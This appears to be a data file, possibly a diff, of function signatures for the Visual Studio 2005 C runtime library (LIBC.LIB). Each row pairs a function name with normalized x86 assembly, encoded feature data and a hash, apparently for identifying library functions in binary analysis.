mXTpk2M0EptMM6c60bjPq9CnuCOcL35cAAAAAuToUWScPdRLYzQSm9CnuCPs/q2oAAAAA9CnuCNsHce8AAAAA0wzpzouZ/5z1t4FR4KVNZycPdRLYzQSmNRZyE7AM10MAAAAA5l06ZCcPdRK5m+6qRD6c1BYJ39g1oZ2yxAVustsHce8AAAAATn6CqoEvqNG7tlwsWNooOt+CnwdY2ig69beBUWZ5MTUAAAAA5wvfl4EvqNG7tlwsWNooOvQp7ghy6DpFuZvuqsSSpmgAAAAAbrvNok5+gqqX2nuUtG4z6ouZ/5z1t4FRNaGdsrTftAoAAAAAcug6Rd+Cnwc1FnITxJKmaEL41tYAAAAAu7ZcLPQp7gi7tlwsIYd5Y8QFbrJy6DpFi5n/nPbMFSFAZ//uu7ZcLPQp7gi7tlwsJw91Eibu4WUnD3USu7ZcLLAM10PEBW6yJw91EicPdRKyegnV9CnuCNsHce8AAAAA,05682489b3cb1e8254692e2850abe4e6d7799c8d,VS2005,LIBC.LIB
+__sopen,"OR BYTE PTR SS:[EBP+CONST],CONST\nPUSH CONST\nMOV R32,R32\nPOP R32\nAND R32,R32\nSUB R32,R32\nJCC CONST",WCuPVrk6FFkAAAAAJ/7SftMM6c4AAAAAJw91EuZdOmTiyiL0u7ZcLLk6FFngpU1n4soi9Lmb7qrmXTpk2M0EptMM6c60bjPq9CnuCOcL35cAAAAAuToUWScPdRLYzQSmIYd5Y8QFbrJy6DpF9CnuCPs/q2oAAAAA9CnuCNsHce8AAAAA0wzpzouZ/5z1t4FR9CnuCOcL35cAAAAAqvEvWCbu4WUAAAAA5l06ZCcPdRK5m+6qu7ZcLPQp7gi7tlwsJw91EicPdRKyegnVRD6c1BYJ39g1oZ2yTn6CqoEvqNG7tlwsWNooOt+CnwdY2ig69beBUWZ5MTUAAAAA5wvfl4EvqNG7tlwsl9p7lPQp7giX2nuU9CnuCNsHce8AAAAAWNooOvQp7ghy6DpFuZvuqsSSpmgAAAAAKxOjwlvQFeCmrZQN2M0EptjNBKYn/tJ+cug6Rd+Cnwc1FnITxJKmaEL41tYAAAAAu7ZcLPQp7gi7tlwsxAVustsHce8AAAAAi5n/nPbMFSFAZ//uJw91Eibu4WUnD3USu7ZcLLAM10PEBW6yNaGdsrTftAoAAAAA9CnuCNsHce8AAAAAJw91Eibu4WWq8S9Y2M0EpicPdRInD3USFgnf2FQwF2Jb0BXg34KfB9jNBKbAfTo9NRZyE7AM10MAAAAAW9AV4G67zaIVojFWsnoJ1YU0ZeNmgpy72wdx79jNBKbAfTo99CnuCPs/q2oAAAAAtN+0ClQwF2Jb0BXgJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAQGf/7ru2XCxvOBb/wH06PdjNBKYrE6PC+z+raljaKDohh3ljbrvNok5+gqqX2nuUtG4z6ouZ/5z1t4FRFaIxVlQwF2Juu82iZoKcuycPdRJeo4MnbzgW/2Z5MTUAAAAArZF/ArAM10P0Ke4I9swVIWZ5MTUAAAAAVDAXYk5+gqqX2nuU2M0EplvQFeCmrZQNXqODJ7mb7qoAAAAA4KVNZycPdRLYzQSmhTRl4+ZdOmQnD3USpq2UDdjNBKZOd4J8cug6RcQFbrJy6DpFcug6RfQp7ghY2ig6ZnkxNUL41tYAAAAAxAVusvs/q2oAAAAAl9p7lPQp7giwDNdDWNooOvQp7gitkX8CW9AV4NjNBKZOd4J8sAzXQ8SSpmgAAAAAu7ZcLLu2XCxYK49WTneCfNjNBKYn/tJ+gS+o0VjaKDohh3lj,[],380a54720a8fae9f50e7b492874d248d394222e7,VS2005,LIBC.LIB
+??0__non_rtti_object@@QAE@PBD@Z,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nPUSH R32",3PxrGwAAAAAAAAAA,Htj4zgAAAAAAAAAAS3pD7wAAAAAAAAAAy5vqiUt6Q+8e2PjO,74f00912aaa843cb810ccdc6f22db7d7fdd940b6,VS2005,LIBC.LIB
+??0bad_cast@@QAE@ABQBD@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV DWORD PTR DS:[R32],0\nMOV R32,R32\nPOP R32\nRETN CONST",WXu0VwAAAAAAAAAA,Htj4zgAAAAAAAAAAS3pD7wAAAAAAAAAAy5vqiUt6Q+8e2PjO,02898e0323089f082d377870b44a9df410a21cc0,VS2005,LIBC.LIB
+??1bad_cast@@UAE@XZ,"CMP DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nJCC CONST",NrJVTAGhdbN1AAcsNRZyEzayVUwAAAAAdQAHLAGhdbMAAAAAAaF1swAAAAAAAAAA,[],915ab768cdc900e65c9eb3acce4e35818a392b65,VS2005,LIBC.LIB
+??0__non_rtti_object@@QAE@ABV0@@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV DWORD PTR DS:[R32],0\nMOV R32,R32\nPOP R32\nRETN CONST",WXu0VwAAAAAAAAAA,+Hf5wV8iGcAAAAAA9kJOTF8iGcAAAAAA7nICVV8iGcD2Qk5MP9Ml8fh3+cHucgJVXyIZwAAAAAAAAAAA,02898e0323089f082d377870b44a9df410a21cc0,VS2005,LIBC.LIB
+??_G__non_rtti_object@@UAEPAXI@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nTEST BYTE PTR SS:[ESP+CONST],CONST\nJCC CONST",+nrC6ID9In65m+6qgP0ifgAAAAAAAAAAuZvuqoD9In4AAAAA,[],eb664150ccd310f6636b2f333673399c6ba7636a,VS2005,LIBC.LIB
+??0bad_typeid@@QAE@ABV0@@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV DWORD PTR DS:[R32],0\nMOV R32,R32\nPOP R32\nRETN CONST",WXu0VwAAAAAAAAAA,XyIZwAAAAAAAAAAA7nICVV8iGcD2Qk5M+Hf5wV8iGcAAAAAA9kJOTF8iGcAAAAAAP9Ml8fh3+cHucgJV,02898e0323089f082d377870b44a9df410a21cc0,VS2005,LIBC.LIB
+___RTDynamicCast,"AND DWORD PTR SS:[EBP+CONST],0\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]",3RhnvgAAAAAAAAAAN9QtU06HQLMAAAAAQBwOVU6HQLMAAAAAhRWBvIgXWkgAAAAAVR0RHQAAAAAAAAAAj+iRDZJ6l4yFFYG8iBdaSFUdER0AAAAATodAs5J6l4yFFYG8knqXjIgXWkjdGGe+hZCR0QAAAAAAAAAALBoDF4/okQ031C1TZDZnAiwaAxdAHA5VtaLhZGQ2ZwKFkJHR,[],f3ac6998ceb50438aa1cad918984a1c01f69f6d5,VS2005,LIBC.LIB
+??0bad_typeid@@QAE@PBD@Z,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nPUSH R32\nCALL CONST\nMOV DWORD PTR DS:[R32],0\nMOV R32,R32\nPOP R32",Zy1kJgAAAAAAAAAA,y5vqiUt6Q+9FBvnzRQb580t6Q+8AAAAAS3pD7wAAAAAAAAAA,ac470f622cf10919b3e7c41a696c876d6c61f044,VS2005,LIBC.LIB
+??0bad_cast@@QAE@ABV0@@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV DWORD PTR DS:[R32],0\nMOV R32,R32\nPOP R32\nRETN CONST",WXu0VwAAAAAAAAAA,P9Ml8fh3+cHucgJV7nICVV8iGcD2Qk5MXyIZwAAAAAAAAAAA+Hf5wV8iGcAAAAAA9kJOTF8iGcAAAAAA,02898e0323089f082d377870b44a9df410a21cc0,VS2005,LIBC.LIB
+___RTCastToVoid,"AND DWORD PTR SS:[EBP+CONST],0\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nOR DWORD PTR SS:[EBP+CONST],CONST\nJMP SHORT CONST",Ju7hZVUdER0AAAAAt1b7rFUdER0AAAAAVR0RHQAAAAAAAAAABtWLo7dW+6wm7uFl,[],d3b411fde9e0d52342a5bb83098205e90d69b189,VS2005,LIBC.LIB
+??1bad_typeid@@UAE@XZ,"CMP DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nJCC CONST",NRZyEzayVUwAAAAAdQAHLAGhdbMAAAAAAaF1swAAAAAAAAAANrJVTAGhdbN1AAcs,[],915ab768cdc900e65c9eb3acce4e35818a392b65,VS2005,LIBC.LIB
+___RTtypeid,"AND DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nPUSH DWORD PTR DS:[R32+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32",JqJA0QAAAAAAAAAA8KbbLdvStaomokDR2myrs9vStaomokDRtaLhZNpsq7Pwptst29K1qgAAAAAAAAAA,[],830a861d4da513694d62fc500c17026055d9c28d,VS2005,LIBC.LIB
+??_Gbad_typeid@@UAEPAXI@Z,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nPOP R32\nRETN CONST",wi7OqAAAAAAAAAAA+nrC6ID9In7CLs6ogP0ifgAAAAAAAAAA,[],8f613689014deb74a8d25261442b547d03785cf0,VS2005,LIBC.LIB
+??_Gbad_cast@@UAEPAXI@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nTEST BYTE PTR SS:[ESP+CONST],CONST\nJCC CONST",+nrC6ID9In65m+6qgP0ifgAAAAAAAAAAuZvuqoD9In4AAAAA,[],eb664150ccd310f6636b2f333673399c6ba7636a,VS2005,LIBC.LIB
+??1__non_rtti_object@@UAE@XZ,"CMP DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nJCC CONST",dQAHLAGhdbMAAAAAAaF1swAAAAAAAAAANrJVTAGhdbN1AAcsNRZyEzayVUwAAAAA,[],915ab768cdc900e65c9eb3acce4e35818a392b65,VS2005,LIBC.LIB
+_is_wctype,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAA,ooK9CWLtYE0AAAAAamOe3cX42h6s37Pmyv6+Lazfs+ac7n8wrN+z5gAAAAAAAAAAxfjaHgAAAAAAAAAAYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0J,0151607032ce108db2b2cd2e24de6db320bf2044,VS2005,LIBC.LIB
+_iswctype,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVZX R32,WORD PTR SS:[EBP+CONST]\nMOVZX R32,R16\nAND R32,R32\nLEAVE\nRETN",xfjaHgAAAAAAAAAArN+z5gAAAAAAAAAAamOe3cX42h6s37PmYu1gTQAAAAAAAAAAnO5/MGpjnt2igr0Jyv6+Lazfs+ac7n8wooK9CWLtYE0AAAAA,[],e08f312e93bc639e0168f81c1a8248d1a10d049d,VS2005,LIBC.LIB
+__strset,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nXOR R32,R32\nOR R32,CONST\nREPNE SCAS BYTE PTR ES:[R32]",AioKwgAAAAAAAAAA,[],d89078728a38cac5b74952b00ec465829aef82c8,VS2005,LIBC.LIB
+_strrchr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nOR R32,CONST\nREPNE SCAS BYTE PTR ES:[R32]\nINC R32",DczAAQd7Cp8AAAAAu35lS6IvkQgNzMABoi+RCAAAAAAAAAAAB3sKnwAAAAAAAAAA,[],c71ce0e95d8c3742e609fd17c13ef819795445f8,VS2005,LIBC.LIB
+__mbstok,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32\nPOP R32\nJCC CONST",DczAATlafGAAAAAAj+LO/Q56nagp6uhIKeroSG/9rqiW7PjPJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAKeroSEfVw+5299ZSb/2uqA56naiP4s79luz4zybu4WVv/a6ouyGU9kupfWCJrtQudvfWUg3MwAEAAAAARTuMbbshlPajhXV2R9XD7g3MwAEAAAAAia7ULsEtrcMAAAAAj+LO/Sbu4WUp6uhIwS2twybu4WWP4s79DnqdqDlafGAAAAAAS6l9YCbu4WXBLa3Do4V1djlafGAAAAAA,[],f717fcd14966dee4303dbac777c81216267cb8a4,VS2005,LIBC.LIB
+__wcsncoll,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",P9Bkq8K8QFbSiz3P0os9zwAAAAAAAAAAT4vMCgAAAAAAAAAAS6l9YD/QZKuwlLLIsJSyyAGhdbMAAAAAwrxAVgAAAAAAAAAACXYH8EupfWBPi8wKAaF1swAAAAAAAAAA,[],8724f312d7d930b017b73fcb194ec31b5061e46d,VS2005,LIBC.LIB
+__setargv,"PUSH CONST\nCALL CONST\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",QQzyruee1pNv0KYLtwWKiOee1pNv0KYLb9CmC8mb2K6BrXNg557Wk8mb2K6BrXNgnOZh+7cFiohBDPKuga1zYAAAAAAAAAAAyZvYrgAAAAAAAAAA,[],83160ab83369484b1deefe322d61003acf66b776,VS2005,LIBC.LIB
+__CIpow,"SUB ESP,CONST\nFXCH ST(1)\nFSTP QWORD PTR SS:[ESP]\nFST QWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",ZnmWXAAAAAAAAAAA,yV64Y3rJtbf7M6fY2sAfc5zufzAAAAAA/MSgqtFIlKUAAAAAesm1t1pSGfFaUhnxrv5UnWUDTs+9u4AvTO7Mu1fm/f/o/oHQJBgiq9FIlKUR3zjEpIL5ogAAAAAAAAAAWlIZ8ZzufzAAAAAAFrN0wgDh1mvqMoS4H/z+p7u2XCwAAAAA6P6B0Jr2y/8AAAAA3C8rR2UDTs+9u4AvV+b9/9FIlKUAAAAA/MSgqtFIlKUAAAAAJX6Urru2XCwf/P6nTxWmMiQYIqvtnDeMMPx8Ilfm/f9X5v3/HR784ud0XHxbyFgs53RcfFvIWCzJXrhjWlIZ8ZzufzAAAAAAV+b9/9FIlKUAAAAACIB/JJzufzDawB9z7Zw3jNFIlKUAAAAAW8hYLE8VpjIkGCKrDczAAZr2y/8AAAAAnO5/MADh1msGW9GDZQNOz0zuzLsoGbdpBlvRgwDh1msAAAAAvbuALw3MwAEdHvziBlvRgwDh1msAAAAAH/z+p7u2XCwAAAAAAOHWawAAAAAAAAAAKBm3aXLoOkWchlE4+zOn2AiAfyTdCBqm3QgapvzEoKo8UwzL6jKEuAZb0YMQ218zEd84xJzufzCzkyAM0UiUpZzufzCzkyAMmvbL/3LoOkWchlE4ENtfMwZb0YMqs0LeKrNC3ru2XCwAAAAAs5MgDFHkdFEAAAAAu7ZcLKSC+aKkgvmipIL5ogAAAAAAAAAAnIZRODD8fCJy6DpFPFMMy9FIlKUAAAAA0UiUpZzufzCfE9yP6FWr2iV+lK4Ws3TCcug6RVfm/f8bvrP5G76z+ZzufzD8xKCqdJ71iK7+VJ3cLytHUeR0USV+lK7oVavaAOHWawAAAAAAAAAAJX6Urru2XCwf/P6nnxPcjwAAAAAAAAAA,609a4a3ca92856ab20478f49ab77880d3a3ed7d4,VS2005,LIBC.LIB
+_pow,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,R32\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nCMP WORD PTR SS:[ESP],CONST\nJCC CONST",6P6B0Jr2y/8AAAAAV+b9/9FIlKUAAAAA/MSgqtFIlKUAAAAATxWmMiQYIqvtnDeMWlIZ8U8VpjIAAAAAMPx8Ilfm/f9X5v3/HR784ud0XHxbyFgs53RcfFvIWCzJXrhjV+b9/9FIlKUAAAAA7Zw3jNFIlKUAAAAAW8hYLE8VpjIkGCKrDczAAZr2y/8AAAAAvbuALw3MwAEdHvziZQNOz0zuzLsoGbdpyV64Y3rJtbf7M6fYJBgiq9FIlKUR3zjEKBm3aXLoOkWchlE4+zOn2AiAfyTdCBqmEd84xLOTIAyzkyAM0UiUpbOTIAyzkyAMmvbL/3LoOkWchlE4s5MgDNFIlKUAAAAA3QgapvzEoKo8UwzLnIZRODD8fCJy6DpFPFMMy9FIlKUAAAAAPqKy/a7+VJ3cLytH0UiUpZ8T3I+fE9yPcug6RVfm/f8bvrP5G76z+fzEoKr8xKCqCIB/JNrAH3PawB9znxPcjwAAAAAAAAAA2sAfc3rJtbcAAAAA3C8rR2UDTs+9u4Avesm1t1pSGfFaUhnxrv5UnWUDTs+9u4AvTO7Mu1fm/f/o/oHQ/MSgqtFIlKUAAAAAWlIZ8VpSGfEAAAAA,[],03168b286da12a565ade1957d06d5bdd5ba83587,VS2005,LIBC.LIB
+_fmod,CALL CONST\nWAIT\nFSTSW R16\nWAIT\nSAHF\nJCC CONST,XG9a9iQDw53udxjT/MSgquSUb/wAAAAA7ncY0wAAAAAAAAAA5JRv/P5SkXaxde5HJAPDnf5SkXaxde5HsXXuR1xvWvYAAAAA/MSgqvzEoKoAAAAA/lKRdiQDw53udxjT,[],05d483e48e8cd9a2eb87d535c3e31efe2f3d6853,VS2005,LIBC.LIB
+__CIfmod,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST",5fTU+wAAAAAAAAAA/MSgquX01PsAAAAA,[],de9e8356a5c960fc4f28cf139d40caec697dde09,VS2005,LIBC.LIB
+__tell,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,ZSrbFTlafGAAAAAAOVp8YAAAAAAAAAAAGaZm/wPnnroAAAAAlVAczHLoOkUAAAAAW5U9SeRSvJ+VUBzMbs+K0Yn1qG/yPC8KifWobwAAAAAAAAAAA+eeugAAAAAAAAAA5FK8n2Uq2xU9ZCFocug6RWUq2xU9ZCFoPWQhaAPnnroAAAAABWuvt1uVPUkZpmb/8jwvCon1qG8Fa6+3,51c6ca22182da5238a034f8bac6d286b576610dd,VS2005,LIBC.LIB
+__mbsnccnt,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nMOV R32,R32\nDEC R32\nTEST R32,R32\nJCC CONST",jK+E1Y/izv0A4dZrj+LO/QDh1msp6uhIKeroSIyvhNX81CstAOHWawAAAAAAAAAAKMY6AQDh1muFBAvC/NQrLQDh1mthmoGJYZqBiQDh1muMr4TVhQQLwo/izv0AAAAA,[],f7273c88801b1c0d471796c0f30d849d62a570cc,VS2005,LIBC.LIB
+_strerror,"PUSH R32\nMOV R32,0\nPUSH DWORD PTR DS:[R32*4]\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nPOP R32",+Bwl7wAAAAAAAAAArAXlOgAAAAAAAAAAcug6RawF5Tr4HCXvE2qPJawF5Tpy6DpF,[],c22b1dbfa296d0fe49a69b03880e95743c67091a,VS2005,LIBC.LIB
+__set_statfp,"WAIT\nFSTSW R16\nFLD TBYTE PTR DS:[0]\nFSTP QWORD PTR SS:[EBP+CONST]\nWAIT\nWAIT\nFSTSW R16\nTEST R8,CONST",OmU1PAAAAAAAAAAAW9AV4FvQFeB6JkIlW9AV4FvQFeDfl88EeiZCJVvQFeBeweqVtpbkFVvQFeCR+ehh35fPBFvQFeAAAAAAW9AV4DplNTz53UrwW9AV4FvQFeBeweqVkfnoYVvQFeB6JkIl+d1K8DplNTwAAAAAXsHqlVvQFeDfl88E,[],42caf140c7b7837ceaa334c347a61bab73512cf6,VS2005,LIBC.LIB
+__clrfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nFSTSW WORD PTR SS:[EBP+CONST]\nFCLEX\nMOVSX R32,WORD PTR SS:[EBP+CONST]\nLEAVE\nRETN",Sv5xkwAAAAAAAAAA,[],a4b60dfa740cf56f7bc4932d3aad0677d70cb053,VS2005,LIBC.LIB
+__ctrlfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]",qvDA+QAAAAAAAAAA,[],b162434ec90540295a01478dc33025989a8a96f0,VS2005,LIBC.LIB
+__statfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nMOVSX R32,WORD PTR SS:[EBP+CONST]\nLEAVE\nRETN",kMfo9wAAAAAAAAAA,[],48c663e029d51b2ed6e4d021259192438d55f8bb,VS2005,LIBC.LIB
+_perror,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",cug6ReofuXIm4Z1SkTDPGE4U23IUxIhqJuGdUgAAAAAAAAAA6h+5cgAAAAAAAAAAV5vX1SbhnVJy6DpFFMSIak4U23JXm9fVThTbcibhnVJy6DpF,[],45524eb2f1dd9b938586e18e1039752c53edaed3,VS2005,LIBC.LIB
+_fwprintf,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",gK7LzQAAAAAAAAAA,WFl2nyh59rYAAAAAT4vMCgAAAAAAAAAARyjsnAAAAAAAAAAAB49nGwAAAAAAAAAAWNooOljaKDoNzMAB+y3xuAePZxteToBoKHn2tk+LzAr7LfG4DczAASh59rYAAAAA9pxlVEco7JwAAAAAXk6AaAePZxv2nGVUWNooOk+LzApYWXafR7G+cE+LzApY2ig6,cd7c2edc5c6315bd0c3d6929ab99fc777a9c8de7,VS2005,LIBC.LIB
+__ismbbpunct,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGmJu7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1,578f40c889281ca5fd86965ca6129b50bd058ba6,VS2005,LIBC.LIB
+__ismbbkpunct,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,zSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGmJu7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAA,9b7275e4f8d7c5c1f303db065bcdc84aeb519c13,VS2005,LIBC.LIB
+__ismbbalpha,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",sk0kPQAAAAAAAAAA,cug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGmJu7hZXLoOkUAAAAA,a238e5067ef33e5b61bfb4e0902aadb75b989519,VS2005,LIBC.LIB
+__ismbbkana,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",Us42lQAAAAAAAAAAZoKcu1LONpVVCe4XUg74tAAAAAAAAAAAVQnuF1LONpVSDvi0,[],ca28569db9d821d4ebbdf1e9c8d771ccd5a8c415,VS2005,LIBC.LIB
+__ismbbkalnum,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,cug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGmJu7hZXLoOkUAAAAA,51c6ca22182da5238a034f8bac6d286b576610dd,VS2005,LIBC.LIB
+__ismbbtrail,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,Ju7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGm,517eb929b3d93a8022eda2e798b8c56bc6c72676,VS2005,LIBC.LIB
+__ismbbgraph,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",sk0kPQAAAAAAAAAA,DObBkVIO+LTNLBGmJu7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAA,e27edbf79864526f7372a00d55133b5899b5a5f3,VS2005,LIBC.LIB
+__ismbbkprint,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGm5FK8n1IO+LQBoXWzcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpuRSvJ8snQh1,ebc03ca84c301982165faabed194b2682a61e30b,VS2005,LIBC.LIB
+__ismbbprint,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",sk0kPQAAAAAAAAAA,Ug74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGmJu7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAA,ea6212708ef89590c8d97b166793e15be73ca695,VS2005,LIBC.LIB
+__ismbbalnum,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",sk0kPQAAAAAAAAAA,5FK8n1IO+LQBoXWzcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpuRSvJ8snQh1LJ0IdXLoOkUAAAAADObBkVIO+LTNLBGm,61a2f1e1d8cd895d6b9818c97eb322bb6f4b90df,VS2005,LIBC.LIB
+__ismbblead,"PUSH CONST\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",jAOi6QAAAAAAAAAA,DObBkVIO+LTNLBGmJu7hZXLoOkUAAAAAcug6RVIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAzSwRpibu4WUsnQh1LJ0IdXLoOkUAAAAA,676da3ed778dcfb0f418652188f1423806c6273a,VS2005,LIBC.LIB
+___crtGetEnvironmentStringsW,"INC EBP\nMOV DWORD PTR SS:[ESP+CONST],EBP\nLEA R32,DWORD PTR SS:[EBP+EBP]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32",exTVxa2s3NApkic+QTVVJbR+Ah0Zpmb/u7ZcLCbu4WVy6DpFcug6RcvPpopBNVUlGaZm/3LoOkUAAAAAQTVVJSbu4WXLz6aKy8+mihDIwv6O8TN3KZInPnsU1cWWfJuvjvEzdybu4WUbZUJKtH4CHSbu4WU/ZxnNWXW8vD9DBaoAAAAAGaZm/3LoOkUAAAAAu7ZcLLu2XCxy6DpFcug6RT9nGc20fgIdG2VCSo7xM3cQyML+lnybrz9DBaoAAAAArazc0JIUImsAAAAAP2cZzYvHpbq+knn4P0MFqpIUImsAAAAAEMjC/qFTtUmzGBT2vpJ5+L6Sefi+knn4vpJ5+L6SefiLx6W6tH4CHSbu4WUZpmb/i8elull1vLw/QwWqsxgU9pIUImsAAAAAK9DecLu2XCxBNVUlJu7hZZIUImsAAAAAkhQiawAAAAAAAAAAP0MFqpIUImsAAAAAoVO1SZZ8m697FNXF,[],69bf0f75700849169f1d59bc02281a320f89d74e,VS2005,LIBC.LIB
+_setbuf,"PUSH CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",b/JwFgAAAAAAAAAASVCWlm/ycBaN0f2zyx5dewAAAAAAAAAAjdH9s8seXXsAAAAA,[],976946c52cf54254fabe9221e63c399b27aa1462,VS2005,LIBC.LIB
